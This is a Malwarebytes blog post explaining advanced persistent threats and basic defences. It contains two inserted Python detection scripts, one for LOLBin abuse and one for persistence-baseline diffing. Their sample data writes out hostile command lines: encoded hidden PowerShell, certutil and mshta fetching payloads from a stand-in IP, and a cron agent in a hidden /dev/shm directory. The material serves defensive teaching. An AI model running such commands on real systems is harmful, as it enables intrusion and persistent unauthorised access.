How to understand and avoid Advanced Persistent Threats
2026-02-26 18:52:11 Author: www.malwarebytes.com

By definition, an advanced persistent threat (APT) is a prolonged, targeted attack on a specific victim with the intention to compromise their system and gain information from or about that target.

About a decade ago, the term was used almost exclusively for state-sponsored threat actors. I say threat actors rather than cybercriminals because, in the state they operate from and on behalf of, they are not regarded as criminals. That perception changes, of course, when you are on the receiving end of such an attack.

When these threats were first identified, their targets were governments and military organizations. Nowadays the target can be any person, organization, or business. We commonly see attacks on healthcare, telecoms, finance, managed service providers (MSPs), SaaS platforms, and supply chain providers.

“APT” is often used as a dramatic label for any serious breach, even one that was short-lived or opportunistic. So let’s break down the name to see what really qualifies as an APT.

Advanced

Advanced does not necessarily mean Hollywood-level hacking, but it does mean the attackers are deliberate and well prepared. They often combine several techniques: buying or discovering new, unknown software flaws (so-called zero-day vulnerabilities), abusing old but unpatched bugs, and crafting very convincing phishing emails that look like genuine messages from colleagues or partners. They may also use legitimate administrative tools already present in the network, so-called LOLBins (living-off-the-land binaries), which makes their activity harder to spot because it looks like normal IT work.

In practice, “advanced” is less about using the fanciest tool and more about choosing the right mix of tools and tactics for a specific victim. An APT group might spend weeks studying a target’s people, systems, and suppliers, and then analyze that data with the help of AI. That way, when they finally make a move, it has the highest chance of working on the first try.
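One practical consequence of LOLBin abuse is that the binary name alone tells you little; what stands out is the context: which process launched it and with what arguments. The script below is an added example, not code from the original article or from Malwarebytes. It runs a handful of such context rules over a few constructed process-creation events (the pipe-separated field layout and every value in it are made up for this example and are not any vendor's log format) and flags the chains an APT operator typically leaves behind: an Office application spawning a scripting host, PowerShell with an encoded or hidden-window command, certutil fetching a file from a URL, and mshta or regsvr32 loading a remote payload. The legitimate backup job on srv-db01 uses the same powershell.exe and is deliberately left unflagged.

```python
"""Detect living-off-the-land (LOLBin) abuse in process-creation events.

Added example, not code from the original article. The events below are
constructed; the field layout "timestamp|host|parent_image|image|command_line"
is an assumption for this example, not any real vendor's log format.
"""
import re
from dataclasses import dataclass, field

# Constructed sample events (assumed layout, see module docstring).
SAMPLE_EVENTS = r"""
2026-02-26T09:00:01Z|ws-014|explorer.exe|winword.exe|"C:\Program Files\Microsoft Office\WINWORD.EXE" /n invoice.docx
2026-02-26T09:00:09Z|ws-014|winword.exe|powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2026-02-26T09:01:30Z|ws-014|cmd.exe|certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.5/update.txt C:\Users\Public\u.exe
2026-02-26T09:02:15Z|ws-022|services.exe|svchost.exe|svchost.exe -k netsvcs
2026-02-26T09:03:44Z|srv-db01|cmd.exe|powershell.exe|powershell.exe -File C:\Scripts\nightly-backup.ps1
2026-02-26T09:04:10Z|ws-014|cmd.exe|mshta.exe|mshta.exe http://203.0.113.5/a.hta
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
REMOTE_LOADERS = {"mshta.exe", "regsvr32.exe", "rundll32.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
ENCODED_RE = re.compile(r"\s-(e|ec|enc|encodedcommand)\s")   # PowerShell -EncodedCommand forms
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden")            # PowerShell -WindowStyle Hidden


@dataclass
class Event:
    timestamp: str
    host: str
    parent: str
    image: str
    cmdline: str
    hits: list = field(default_factory=list)


def parse_events(text):
    """Parse the pipe-separated sample format into Event objects."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append(Event(ts, host, parent.lower(), image.lower(), cmdline))
    return events


def evaluate(ev):
    """Apply context rules: parent process plus arguments, not just the binary name."""
    cl = " " + ev.cmdline.lower() + " "
    if ev.parent in OFFICE_APPS and ev.image in SCRIPT_HOSTS:
        ev.hits.append("office-spawns-script-host")
    if ev.image == "powershell.exe" and ENCODED_RE.search(cl):
        ev.hits.append("powershell-encoded-command")
    if ev.image == "powershell.exe" and HIDDEN_RE.search(cl):
        ev.hits.append("powershell-hidden-window")
    if ev.image == "certutil.exe" and ("-urlcache" in cl or "-decode" in cl):
        ev.hits.append("certutil-download-or-decode")
    if ev.image in REMOTE_LOADERS and URL_RE.search(cl):
        ev.hits.append("lolbin-remote-payload")
    return ev.hits


def detect(text):
    """Return only the events that triggered at least one rule."""
    return [ev for ev in parse_events(text) if evaluate(ev)]


def hosts_by_rule_count(flagged):
    """Rank hosts by the number of distinct rules they tripped: one suspicious
    process is noise, a chain of different ones on the same host is a campaign."""
    rules = {}
    for ev in flagged:
        rules.setdefault(ev.host, set()).update(ev.hits)
    return sorted(rules.items(), key=lambda kv: len(kv[1]), reverse=True)


if __name__ == "__main__":
    flagged = detect(SAMPLE_EVENTS)
    for ev in flagged:
        print(f"{ev.timestamp} {ev.host} {ev.parent} -> {ev.image}: {', '.join(ev.hits)}")
    for host, rules in hosts_by_rule_count(flagged):
        print(f"{host}: {len(rules)} distinct rules")
```

The design point is that every rule keys on the parent process and the command-line arguments rather than on the image name: alerting on powershell.exe or certutil.exe by themselves would bury the security team in noise from ordinary administration, which is exactly the cover a LOLBin-based intrusion relies on.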

Persistent

Persistence is what makes APTs so dangerous. These attackers are not interested in a quick hit-and-run raid. They want to break in, stay inside, and keep coming back for as long as access is useful to them. If defenders discover their activity and evict them from one system, they may fall back on another back door they prepared earlier, or simply regroup and look for a new way in.

Being persistent also means they move slowly and quietly. Attackers may spend months exploring the network, creating multiple hidden entry points, and regularly checking back to see what new data worth stealing has appeared. From the defender’s point of view, this turns the incident from a single event into an ongoing campaign. You have to assume the attackers will try again, even after you think you have removed them.
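Because an evicted intruder tends to return through a second entry point prepared earlier, one habit worth building is to keep an inventory of persistence locations (scheduled tasks, services, Run keys, cron jobs) taken while the systems were known-good, and to diff a fresh snapshot against it after any incident rather than trusting that the one back door you found was the only one. The script below is an added example and is not code from the original article or from Malwarebytes; the `location|name|target` inventory format and every entry in the two snapshots are constructed for illustration, not real system output. It reports entries that are new, changed or removed, and attaches risk flags for the patterns that most often accompany a planted back door: executables in user-writable directories, encoded or hidden-window PowerShell commands, and hidden dot-directories on Unix.

```python
"""Diff a known-good inventory of persistence locations against a fresh snapshot.

Added example, not code from the original article. The "location|name|target"
format and every entry below are constructed for illustration; a real
inventory would be collected from the live systems.
"""
import re

# Baseline taken while the hosts were believed clean (constructed data).
BASELINE = r"""
task|\Microsoft\Windows\UpdateOrchestrator\Schedule Scan|%systemroot%\system32\usoclient.exe StartScan
task|\Backup\Nightly|powershell.exe -File C:\Scripts\nightly-backup.ps1
service|Spooler|C:\Windows\System32\spoolsv.exe
runkey|HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth|C:\Windows\system32\SecurityHealthSystray.exe
cron|/etc/cron.d/logrotate|root /usr/local/bin/logrotate-wrapper.sh
cron|/etc/cron.d/offsite-sync|backup /usr/local/bin/offsite-sync.sh
"""

# Snapshot taken after an incident was "cleaned up" (constructed data).
SNAPSHOT = r"""
task|\Microsoft\Windows\UpdateOrchestrator\Schedule Scan|%systemroot%\system32\usoclient.exe StartScan
task|\Backup\Nightly|powershell.exe -File C:\ProgramData\nightly-backup.ps1
task|\Microsoft\Windows\Diagnosis\HealthCheck|powershell.exe -w hidden -enc SQBFAFgA
service|Spooler|C:\Windows\System32\spoolsv.exe
service|WinDefendHelper|C:\ProgramData\svc\helper.exe
runkey|HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth|C:\Windows\system32\SecurityHealthSystray.exe
cron|/etc/cron.d/logrotate|root /usr/local/bin/logrotate-wrapper.sh
cron|/var/spool/cron/crontabs/www-data|www-data /dev/shm/.x/agent
"""

# Directories an unprivileged user (or a web shell) can normally write to.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\",
                 "/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
ENCODED_RE = re.compile(r"-(e|ec|enc|encodedcommand)\b")   # PowerShell -EncodedCommand forms
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden")         # PowerShell -WindowStyle Hidden
DOTDIR_RE = re.compile(r"/\.[^/\s]+/")                      # /something/.hidden/ on Unix


def parse_inventory(text):
    """Parse 'location|name|target' lines into {(location, name): target}."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        location, name, target = line.split("|", 2)
        entries[(location, name)] = target
    return entries


def risk_flags(target):
    """Patterns that frequently accompany a planted back door."""
    t = target.lower()
    flags = []
    if any(p in t for p in USER_WRITABLE):
        flags.append("user-writable-path")
    if ENCODED_RE.search(t):
        flags.append("encoded-command")
    if HIDDEN_RE.search(t):
        flags.append("hidden-window")
    if DOTDIR_RE.search(t):
        flags.append("hidden-unix-directory")
    return flags


def diff_persistence(baseline_text, snapshot_text):
    """Report added, changed and removed persistence entries with risk flags."""
    base = parse_inventory(baseline_text)
    now = parse_inventory(snapshot_text)
    findings = []
    for (location, name), target in now.items():
        if (location, name) not in base:
            findings.append({"change": "added", "location": location, "name": name,
                             "target": target, "flags": risk_flags(target)})
        elif base[(location, name)] != target:
            # A legitimate entry pointed somewhere new is a classic hijack.
            findings.append({"change": "changed", "location": location, "name": name,
                             "target": target, "previous": base[(location, name)],
                             "flags": risk_flags(target)})
    for (location, name), target in base.items():
        if (location, name) not in now:
            # A vanished job (e.g. a backup) can be sabotage rather than cleanup.
            findings.append({"change": "removed", "location": location, "name": name,
                             "target": target, "flags": []})
    return findings


if __name__ == "__main__":
    for f in diff_persistence(BASELINE, SNAPSHOT):
        tag = ", ".join(f["flags"]) or "no risk flags"
        print(f"[{f['change']:7}] {f['location']} {f['name']} -> {f['target']} ({tag})")
```

Two things the output makes visible that a one-off malware scan does not: the trusted Nightly backup task now points into ProgramData, and the cron job for the web server user has been pointed at a hidden directory under /dev/shm. Neither is a file a signature engine would necessarily object to, which is why comparing against a baseline, rather than judging each entry in isolation, is the more reliable way to catch the second and third back doors.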

Threat

The word threat does not refer to a single piece of malware. It refers to the whole operation: the people, their tools, and their infrastructure. An APT usually combines several types of attack.

An APT may involve phishing, exploiting vulnerabilities, installing remote access tools, and stealing or abusing passwords. Together, these activities form the threat to the organization’s systems and data.

Behind the threat is a team with a goal (for example, stealing sensitive designs, spying on communications, or preparing for future disruption), and with the patience and resources to keep pushing until they reach that goal.

How to stay safe

To avoid falling victim to an APT, assume you could be up against a formidable opponent.

  • Be cautious with unexpected emails, messages and attachments, not just at work.
  • Use passkeys where possible; where not, use strong, unique passwords stored in a password manager.
  • Turn on multi‑factor authentication (MFA) wherever possible.
  • Keep your software and hardware updated, especially public-facing network equipment.
  • Use an up-to-date, real-time anti-malware solution, preferably with a web protection component.
  • Take note of any out-of-the-ordinary activity and report it, as even small details can turn out to be important later.


About the author

Was a Microsoft MVP in consumer security for 12 years running. Can speak four languages. Smells of rich mahogany and leather-bound books.


Source: https://www.malwarebytes.com/blog/how-to/2026/02/how-to-understand-and-avoid-advanced-persistent-threats